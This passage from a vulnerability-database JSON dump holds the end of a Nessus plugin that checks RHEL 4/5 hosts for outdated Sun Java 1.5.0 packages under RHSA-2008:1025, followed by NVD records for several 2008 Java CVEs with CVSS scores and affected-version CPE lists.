script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.5.0-sun\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.5.0-sun-demo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.5.0-sun-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.5.0-sun-jdbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.5.0-sun-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.5.0-sun-src\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4.7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.2\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/12/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/12/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/08/24\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(4|5)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 4.x / 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2008:1025\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL4\", cpu:\"i586\", reference:\"java-1.5.0-sun-1.5.0.17-1jpp.2.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"java-1.5.0-sun-1.5.0.17-1jpp.2.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"i586\", 
reference:\"java-1.5.0-sun-demo-1.5.0.17-1jpp.2.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"java-1.5.0-sun-demo-1.5.0.17-1jpp.2.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"i586\", reference:\"java-1.5.0-sun-devel-1.5.0.17-1jpp.2.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"java-1.5.0-sun-devel-1.5.0.17-1jpp.2.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"i586\", reference:\"java-1.5.0-sun-jdbc-1.5.0.17-1jpp.2.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"java-1.5.0-sun-jdbc-1.5.0.17-1jpp.2.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"i586\", reference:\"java-1.5.0-sun-plugin-1.5.0.17-1jpp.2.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"i586\", reference:\"java-1.5.0-sun-src-1.5.0.17-1jpp.2.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"java-1.5.0-sun-src-1.5.0.17-1jpp.2.el4\")) flag++;\n\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i586\", reference:\"java-1.5.0-sun-1.5.0.17-1jpp.2.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"java-1.5.0-sun-1.5.0.17-1jpp.2.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i586\", reference:\"java-1.5.0-sun-demo-1.5.0.17-1jpp.2.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"java-1.5.0-sun-demo-1.5.0.17-1jpp.2.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i586\", reference:\"java-1.5.0-sun-devel-1.5.0.17-1jpp.2.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"java-1.5.0-sun-devel-1.5.0.17-1jpp.2.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i586\", reference:\"java-1.5.0-sun-jdbc-1.5.0.17-1jpp.2.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"java-1.5.0-sun-jdbc-1.5.0.17-1jpp.2.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i586\", 
reference:\"java-1.5.0-sun-plugin-1.5.0.17-1jpp.2.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i586\", reference:\"java-1.5.0-sun-src-1.5.0.17-1jpp.2.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"java-1.5.0-sun-src-1.5.0.17-1jpp.2.el5\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"java-1.5.0-sun / java-1.5.0-sun-demo / java-1.5.0-sun-devel / etc\");\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2020-12-09T19:28:27", "description": "Java Runtime Environment (JRE) for Sun JDK and JRE 6 Update 10 and earlier might allow remote attackers to execute arbitrary code via a crafted GIF file that triggers memory corruption during display of the splash screen, possibly related to splashscreen.dll.", "edition": 5, "cvss3": {}, "published": "2008-12-05T11:30:00", "title": "CVE-2008-5358", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-5358"], "modified": "2017-09-29T01:32:00", "cpe": ["cpe:/a:sun:jre:6", "cpe:/a:sun:jdk:6"], "id": "CVE-2008-5358", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-5358", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": 
["cpe:2.3:a:sun:jdk:6:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_6:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_10:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_6:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_10:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_1:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:28:26", "description": "Java Web Start (JWS) and Java Plug-in with Sun JDK and JRE 6 Update 10 and earlier; JDK and JRE 5.0 Update 16 and earlier; and SDK and JRE 1.4.2_18 and earlier allows remote attackers to make unauthorized network connections and hijack HTTP sessions via a crafted file that validates as both a GIF and a Java JAR file, aka \"GIFAR\" and CR 6707535.", "edition": 5, "cvss3": {}, "published": "2008-12-05T11:30:00", "title": "CVE-2008-5343", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 8.5, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-5343"], "modified": "2017-09-29T01:32:00", 
"cpe": ["cpe:/a:sun:jre:1.4.2_4", "cpe:/a:sun:jre:6", "cpe:/a:sun:jre:1.4.2_17", "cpe:/a:sun:jre:1.4.2_7", "cpe:/a:sun:jre:1.4.2_10", "cpe:/a:sun:jre:1.4.2_9", "cpe:/a:sun:sdk:1.4.2_11", "cpe:/a:sun:jre:1.4.2_5", "cpe:/a:sun:sdk:1.4.2_4", "cpe:/a:sun:jre:1.4.2_11", "cpe:/a:sun:jre:1.4.2_12", "cpe:/a:sun:jre:1.4.2_16", "cpe:/a:sun:sdk:1.4.2_8", "cpe:/a:sun:jre:1.4.2_14", "cpe:/a:sun:jre:1.4.2_18", "cpe:/a:sun:jre:1.4.2_3", "cpe:/a:sun:jre:1.4.2_6", "cpe:/a:sun:sdk:1.4.2_9", "cpe:/a:sun:sdk:1.4.2_10", "cpe:/a:sun:sdk:1.4.2_12", "cpe:/a:sun:jre:1.4.2_1", "cpe:/a:sun:sdk:1.4.2_7", "cpe:/a:sun:sdk:1.4.2_13", "cpe:/a:sun:sdk:1.4.2_2", "cpe:/a:sun:jre:1.4.2_15", "cpe:/a:sun:jre:5.0", "cpe:/a:sun:jre:1.4.2_8", "cpe:/a:sun:sdk:1.4.2_14", "cpe:/a:sun:sdk:1.4.2_17", "cpe:/a:sun:sdk:1.4.2_16", "cpe:/a:sun:sdk:1.4.2_6", "cpe:/a:sun:jdk:5.0", "cpe:/a:sun:sdk:1.4.2_18", "cpe:/a:sun:sdk:1.4.2_5", "cpe:/a:sun:jre:1.4.2_2", "cpe:/a:sun:sdk:1.4.2_1", "cpe:/a:sun:sdk:1.4.2_3", "cpe:/a:sun:jre:1.4.2_13", "cpe:/a:sun:jdk:6", "cpe:/a:sun:sdk:1.4.2_15"], "id": "CVE-2008-5343", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-5343", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:N/C:C/I:P/A:P"}, "cpe23": ["cpe:2.3:a:sun:jre:1.4.2_4:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_3:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_10:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_6:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_16:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_16:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_9:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_7:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_5:*:*:*:*:*:*:*", 
"cpe:2.3:a:sun:jre:1.4.2_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_9:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_10:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_12:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_13:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_14:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_8:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_9:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_9:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_8:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_14:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_7:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_6:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_13:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_11:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_11:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_6:*:*:*:*:*:*", 
"cpe:2.3:a:sun:jre:1.4.2_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_10:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_9:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_12:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_3:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_4:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_6:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_15:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_1:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_9:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_10:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_5:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_15:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_1:*:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T11:51:04", "description": "Integer overflow in Java Runtime Environment (JRE) for Sun JDK and JRE 6 Update 10 and earlier; JDK and JRE 5.0 Update 16 and earlier; SDK and JRE 1.4.2_18 and earlier; and SDK and JRE 1.3.1_23 and earlier might allow remote attackers to execute arbitrary code via a crafted TrueType font file, which triggers a heap-based buffer overflow.", "edition": 7, "cvss3": {}, "published": "2008-12-05T11:30:00", "title": "CVE-2008-5357", "type": "cve", "cwe": ["CWE-189"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": 
{"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-5357"], "modified": "2019-10-09T22:56:00", "cpe": ["cpe:/a:sun:sdk:1.3.1_15", "cpe:/a:sun:jre:1.4.2_4", "cpe:/a:sun:sdk:1.3.1_16", "cpe:/a:sun:jre:1.4.2_17", "cpe:/a:sun:sdk:1.3.1_13", "cpe:/a:sun:jre:1.4.2_7", "cpe:/a:sun:sdk:1.3.1_02", "cpe:/a:sun:jdk:1.6.0", "cpe:/a:sun:jre:1.4.2_10", "cpe:/a:sun:jre:1.4.2_9", "cpe:/a:sun:jre:1.3.1_08", "cpe:/a:sun:sdk:1.3.1_19", "cpe:/a:sun:jre:1.3.1_23", "cpe:/a:sun:sdk:1.4.2_11", "cpe:/a:sun:jre:1.3.1_04", "cpe:/a:sun:sdk:1.3.1_06", "cpe:/a:sun:jre:1.4.2_5", "cpe:/a:sun:sdk:1.4.2_4", "cpe:/a:sun:sdk:1.4.2_03", "cpe:/a:sun:jre:1.6.0", "cpe:/a:sun:jre:1.4.2_11", "cpe:/a:sun:jre:1.4.2_12", "cpe:/a:sun:jre:1.4.2_16", "cpe:/a:sun:sdk:1.4.2_8", "cpe:/a:sun:sdk:1.3.1_20", "cpe:/a:sun:jre:1.3.1_14", "cpe:/a:sun:jre:1.4.2_14", "cpe:/a:sun:jre:1.4.2_18", "cpe:/a:sun:sdk:1.3.1_23", "cpe:/a:sun:sdk:1.3.1_21", "cpe:/a:sun:jre:1.3.1_07", "cpe:/a:sun:sdk:1.3.1_04", "cpe:/a:sun:jre:1.3.1_12", "cpe:/a:sun:sdk:1.3.1_09", "cpe:/a:sun:jre:1.4.2_3", "cpe:/a:sun:jre:1.3.1_22", "cpe:/a:sun:jre:1.4.2_6", "cpe:/a:sun:sdk:1.4.2_9", "cpe:/a:sun:sdk:1.3.1_17", "cpe:/a:sun:sdk:1.4.2_10", "cpe:/a:sun:sdk:1.4.2_12", "cpe:/a:sun:jre:1.3.1_21", "cpe:/a:sun:jre:1.3.1_15", "cpe:/a:sun:sdk:1.3.1_03", "cpe:/a:sun:sdk:1.3.1", "cpe:/a:sun:sdk:1.4.2_09", "cpe:/a:sun:sdk:1.3.1_01a", "cpe:/a:sun:sdk:1.3.1_11", "cpe:/a:sun:jre:1.4.2_1", "cpe:/a:sun:sdk:1.3.1_22", "cpe:/a:sun:jdk:1.5.0", "cpe:/a:sun:jre:1.5.0", "cpe:/a:sun:sdk:1.3.1_05", "cpe:/a:sun:jre:1.3.1_11", "cpe:/a:sun:jre:1.3.1_16", "cpe:/a:sun:sdk:1.4.2_7", "cpe:/a:sun:sdk:1.4.2_08", "cpe:/a:sun:jre:1.3.1_20", "cpe:/a:sun:jre:1.3.1_2", "cpe:/a:sun:sdk:1.3.1_01", 
"cpe:/a:sun:jre:1.3.1_10", "cpe:/a:sun:sdk:1.3.1_18", "cpe:/a:sun:sdk:1.3.1_14", "cpe:/a:sun:sdk:1.4.2_02", "cpe:/a:sun:sdk:1.4.2_13", "cpe:/a:sun:sdk:1.4.2_2", "cpe:/a:sun:jre:1.3.1", "cpe:/a:sun:sdk:1.3.1_08", "cpe:/a:sun:jre:1.3.1_13", "cpe:/a:sun:jre:1.3.1_05", "cpe:/a:sun:jre:1.4.2_15", "cpe:/a:sun:jre:1.4.2_8", "cpe:/a:sun:sdk:1.4.2_14", "cpe:/a:sun:sdk:1.4.2_04", "cpe:/a:sun:jre:1.3.1_03", "cpe:/a:sun:sdk:1.3.1_10", "cpe:/a:sun:sdk:1.4.2_17", "cpe:/a:sun:jre:1.4.2", "cpe:/a:sun:sdk:1.3.1_12", "cpe:/a:sun:jre:1.3.1_06", "cpe:/a:sun:sdk:1.4.2_16", "cpe:/a:sun:jre:1.3.1_18", "cpe:/a:sun:sdk:1.4.2_6", "cpe:/a:sun:jre:1.3.1_19", "cpe:/a:sun:jre:1.3.1_09", "cpe:/a:sun:sdk:1.4.2_18", "cpe:/a:sun:sdk:1.4.2_5", "cpe:/a:sun:jre:1.3.1_17", "cpe:/a:sun:jre:1.4.2_2", "cpe:/a:sun:sdk:1.4.2_1", "cpe:/a:sun:sdk:1.4.2_3", "cpe:/a:sun:jre:1.4.2_13", "cpe:/a:sun:sdk:1.4.2", "cpe:/a:sun:sdk:1.3.1_07", "cpe:/a:sun:sdk:1.4.2_15"], "id": "CVE-2008-5357", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-5357", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:sun:jre:1.4.2_4:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_3:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_20:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_19:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_08:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_7:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_21:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update11:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_5:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update15:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_05:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update7:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_15:*:*:*:*:*:*:*", 
"cpe:2.3:a:sun:sdk:1.3.1_06:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update9:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update1:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_09:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_22:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_23:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_21:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_02:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update14:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_05:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_8:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_04:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_23:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_01a:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_04:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_06:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update3:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_9:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_19:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_09:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_8:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_04:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_07:*:*:*:*:*:*:*", 